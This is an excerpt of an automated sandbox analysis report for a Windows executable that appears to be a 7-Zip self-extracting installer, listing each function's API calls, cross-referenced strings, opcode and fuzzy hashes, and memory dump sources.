Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658

Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
wsprintfW.USER32 ref: 00403FFB
GetFileAttributesW.KERNEL32(?), ref: 00404016

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88

Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CharUpper
String ID:
API String ID: 9403516-0
Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64

Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
GetDlgItem.USER32(?,000004B7), ref: 00408020
SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
String ID:
API String ID: 2538916108-0
Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54

Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
GetSystemMetrics.USER32(00000031), ref: 0040683A
CreateFontIndirectW.GDI32(?), ref: 00406849
DeleteObject.GDI32(00000000), ref: 00406878

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54

Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040749F
SHBrowseForFolderW.SHELL32(?), ref: 004074B8
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
SHGetMalloc.SHELL32(00000000), ref: 004074FE

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID:
API String ID: 1557639607-0
Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75

Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID:
API String ID: 612612615-0
Opcode ID: ddbb4d8407876be3fd4cef507a0c5286be4c7135757854b2874e871926ba49da
Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
Opcode Fuzzy Hash: ddbb4d8407876be3fd4cef507a0c5286be4c7135757854b2874e871926ba49da
Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8

Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
SetWindowTextW.USER32(?,?), ref: 00403B12
??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: b5bf23dfcb649b2dd38fe4c873e1c0754e372d7d3983432a8b6226a73f45205b
Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
Opcode Fuzzy Hash: b5bf23dfcb649b2dd38fe4c873e1c0754e372d7d3983432a8b6226a73f45205b
Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98

Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407045
CreateFontIndirectW.GDI32(?), ref: 0040705B
GetDlgItem.USER32(?,000004B5), ref: 0040706F
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19

Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401BA8
GetWindowRect.USER32(?,?), ref: 00401BC1
ScreenToClient.USER32(00000000,?), ref: 00401BCF
ScreenToClient.USER32(00000000,?), ref: 00401BD6

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61

Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403C89

Strings

[G@, xrefs: 00403C64, 00403C88
GUIFlags, xrefs: 00403C68

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$[G@
API String ID: 2131799477-2126219683
Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D

Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52

Strings

?O@, xrefs: 00402F23

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: EnvironmentVariable
String ID: ?O@
API String ID: 1431749950-3511380453
Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

Analysis Process: hv.exePID: 7940, Parent PID: 7820COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	678
Total number of Limit Nodes:	2

Executed Functions

Function 6CAF8856 Relevance: 324.3, APIs: 5, Strings: 179, Instructions: 2273COMMON

Download Yara Rule

Strings

, xrefs: 6CAFA95E
^, xrefs: 6CAF9C33
+, xrefs: 6CAFA928
N, xrefs: 6CAFA8E0
), xrefs: 6CAF9582
O, xrefs: 6CAF9C60
S, xrefs: 6CAFA27B
F, xrefs: 6CAF8A1A
7, xrefs: 6CAF9E1D
U, xrefs: 6CAFA8AA
S, xrefs: 6CAF8F6D
:, xrefs: 6CAF8861
VUUU, xrefs: 6CAF9B0C
', xrefs: 6CAF961B
D, xrefs: 6CAF9BD9
, xrefs: 6CAF8F0A
VUUU, xrefs: 6CAFA211
), xrefs: 6CAF9C06
&, xrefs: 6CAFA967
D, xrefs: 6CAFA9D3
S, xrefs: 6CAF8F37
), xrefs: 6CAFA30B
VUUU, xrefs: 6CAFA849
I, xrefs: 6CAF9BAC
$, xrefs: 6CAF887C
VUUU, xrefs: 6CAF8C51
M, xrefs: 6CAFA296
2, xrefs: 6CAF9516
I, xrefs: 6CAF8E95
[, xrefs: 6CAFA9B8
N, xrefs: 6CAF9BA3
', xrefs: 6CAFA8FB
L, xrefs: 6CAFA904
L, xrefs: 6CAFA2CC
!, xrefs: 6CAFA341
S, xrefs: 6CAFA98B
:, xrefs: 6CAF9BE2
U, xrefs: 6CAF8E56
&, xrefs: 6CAF95A6
:, xrefs: 6CAFA9AF
a, xrefs: 6CAFA14E
O, xrefs: 6CAFA365
$, xrefs: 6CAFA9CA
$, xrefs: 6CAF8F76
', xrefs: 6CAF888E
D, xrefs: 6CAF9612
$, xrefs: 6CAFA392
U, xrefs: 6CAF9624
, xrefs: 6CAF9C21
', xrefs: 6CAF8EA7
:, xrefs: 6CAFA377
D, xrefs: 6CAF8885
', xrefs: 6CAFA3A4
&, xrefs: 6CAF9C2A
Q, xrefs: 6CAF9B7F
a, xrefs: 6CAF93C5
VUUU, xrefs: 6CAFA06D
2, xrefs: 6CAF8E83
I, xrefs: 6CAFA8E9
&, xrefs: 6CAFA32F
<, xrefs: 6CAF9504
+, xrefs: 6CAF9567
S, xrefs: 6CAF9C4E
I, xrefs: 6CAFA2B1
U, xrefs: 6CAF94E9
Q, xrefs: 6CAFA284
7, xrefs: 6CAFAB5A
2, xrefs: 6CAFA29F
M, xrefs: 6CAFA8CE
2, xrefs: 6CAF9B9A
S, xrefs: 6CAF95CA
F, xrefs: 6CAF97A7
[, xrefs: 6CAFA380
S, xrefs: 6CAF8F01
:, xrefs: 6CAF8F5B
), xrefs: 6CAF8EEF
!, xrefs: 6CAF8F25
Q, xrefs: 6CAF9A00
, xrefs: 6CAF959D
^, xrefs: 6CAF8F1C
S, xrefs: 6CAF9594
2, xrefs: 6CAFA8D7
S, xrefs: 6CAF9C18
L, xrefs: 6CAF9543
:, xrefs: 6CAF9C72
a, xrefs: 6CAF8D32
M, xrefs: 6CAF950D
U, xrefs: 6CAFA9E5
U, xrefs: 6CAF9B6D
D, xrefs: 6CAFA2DE
[, xrefs: 6CAF886A
', xrefs: 6CAFA2C3
VUUU, xrefs: 6CAF9488
+, xrefs: 6CAF8ED4
<, xrefs: 6CAF9B88
S, xrefs: 6CAFA389
S, xrefs: 6CAFA8B3
D, xrefs: 6CAFA39B
F, xrefs: 6CAF9E2B
, xrefs: 6CAFA326
+, xrefs: 6CAFA2F0
$, xrefs: 6CAF9609
S, xrefs: 6CAF8E5F
:, xrefs: 6CAF955E
Q, xrefs: 6CAFA73D
7, xrefs: 6CAF9799
F, xrefs: 6CAFAB68
', xrefs: 6CAF9C9F
a, xrefs: 6CAFA786
$, xrefs: 6CAF9C8D
a, xrefs: 6CAF9A49
Q, xrefs: 6CAFA105
S, xrefs: 6CAFA31D
L, xrefs: 6CAF9BC7
D, xrefs: 6CAF8F7F
^, xrefs: 6CAF95AF
&, xrefs: 6CAF8F13
^, xrefs: 6CAFA970
U, xrefs: 6CAF8897
N, xrefs: 6CAF8E8C
!, xrefs: 6CAF95B8
:, xrefs: 6CAF95EE
7, xrefs: 6CAF9106
Q, xrefs: 6CAF94FB
U, xrefs: 6CAFA272
I, xrefs: 6CAF9528
Q, xrefs: 6CAF8E68
', xrefs: 6CAF9BBE
<, xrefs: 6CAFA8C5
), xrefs: 6CAFA943
7, xrefs: 6CAF8A0C
[, xrefs: 6CAF9C7B
:, xrefs: 6CAFA2E7
+, xrefs: 6CAF9BEB
VUUU, xrefs: 6CAF8DF5
O, xrefs: 6CAF8F49
VUUU, xrefs: 6CAF9968
Q, xrefs: 6CAF937C
S, xrefs: 6CAFA9C1
D, xrefs: 6CAF9C96
', xrefs: 6CAF953A
!, xrefs: 6CAF9C3C
N, xrefs: 6CAFA2A8
<, xrefs: 6CAFA28D
F, xrefs: 6CAF9114
L, xrefs: 6CAF8EB0
S, xrefs: 6CAFA955
S, xrefs: 6CAF9C84
:, xrefs: 6CAFA91F
S, xrefs: 6CAFA353
U, xrefs: 6CAF9CA8
U, xrefs: 6CAF8F91
VUUU, xrefs: 6CAF92E4
N, xrefs: 6CAF951F
VUUU, xrefs: 6CAFA6A5
D, xrefs: 6CAF8EC2
S, xrefs: 6CAF9600
O, xrefs: 6CAFA99D
7, xrefs: 6CAFA522
U, xrefs: 6CAFA3AD
M, xrefs: 6CAF9B91
F, xrefs: 6CAFA530
S, xrefs: 6CAF9B76
D, xrefs: 6CAFA916
:, xrefs: 6CAF8ECB
S, xrefs: 6CAF8873
^, xrefs: 6CAFA338
<, xrefs: 6CAF8E71
', xrefs: 6CAF8F88
[, xrefs: 6CAF8F64
Q, xrefs: 6CAFA8BC
Q, xrefs: 6CAF8CE9
[, xrefs: 6CAF95F7
', xrefs: 6CAFA9DC
O, xrefs: 6CAF95DC
S, xrefs: 6CAF94F2
M, xrefs: 6CAF8E7A
D, xrefs: 6CAF9555
!, xrefs: 6CAFA979

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID:
String ID: $ $ $ $ $!$!$!$!$!$$$$$$$$$$$$$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$)$)$)$)$)$+$+$+$+$+$2$2$2$2$2$7$7$7$7$7$7$:$:$:$:$:$:$:$:$:$:$:$<$<$<$<$<$D$D$D$D$D$D$D$D$D$D$D$F$F$F$F$F$F$I$I$I$I$I$L$L$L$L$L$M$M$M$M$M$N$N$N$N$N$O$O$O$O$O$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$U$U$U$U$U$U$U$U$U$U$U$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$VUUU$[$[$[$[$[$[$^$^$^$^$^$a$a$a$a$a
API String ID: 0-4199791830
Opcode ID: 6623bf9b8a6f73182f1492c0edafe1c969829831fcc36c917dabe8366a0b8775
Instruction ID: 0d91312a321aaf920dbd97a0af6a6ded3b26f1bfbe8c4d43eef580a8493ba579
Opcode Fuzzy Hash: 6623bf9b8a6f73182f1492c0edafe1c969829831fcc36c917dabe8366a0b8775
Instruction Fuzzy Hash: A043F074D08269CFCB24CFA8C994BDDBBB1BF09308F04419AE429AB711D7759A86CF15

Non-executed Functions

Function 6CBD2330 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

